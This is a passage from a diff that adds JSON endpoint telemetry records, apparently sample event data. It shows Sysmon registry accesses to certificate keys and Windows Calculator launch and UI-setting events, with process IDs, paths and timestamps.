"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573247920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573247920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573247920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "InputHost.dll", + "image_path": "C:\\Windows\\System32\\InputHost.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573246360000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573247920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573247920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573247920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 
131883573247920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573247920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573247920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573247920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573247920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573247920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573247920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\SplashScreen", + "registry_value": "SplashScreen", + "timestamp": 131883573248080000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573248230000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColor", + "registry_value": "ButtonBackgroundColor", + "timestamp": 131883573248230000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram 
Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", + "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", + "timestamp": 131883573248390000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d987985a6\\fae8ab0e", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d987985a6\\fae8ab0e\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573248390000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": 
"Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573248390000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\PreferredMinSize", + "registry_value": "PreferredMinSize", + "timestamp": 131883573248390000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573248390000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColor", + "registry_value": "ButtonForegroundColor", + "timestamp": 131883573248390000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573248390000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverBackgroundColor", + "registry_value": "ButtonHoverBackgroundColor", + "timestamp": 131883573248390000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573248540000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverForegroundColor", + "registry_value": "ButtonHoverForegroundColor", + "timestamp": 131883573248540000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573248540000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedBackgroundColor", + "registry_value": 
"ButtonPressedBackgroundColor", + "timestamp": 131883573248540000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573248540000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedForegroundColor", + "registry_value": "ButtonPressedForegroundColor", + "timestamp": 131883573248540000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": 
"C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573248540000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColorInactive", + "registry_value": "ButtonBackgroundColorInactive", + "timestamp": 131883573248540000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573248540000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColorInactive", + "registry_value": "ButtonForegroundColorInactive", + "timestamp": 131883573248540000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573248700016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColor", + "registry_value": "ButtonBackgroundColor", + "timestamp": 131883573248700016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": 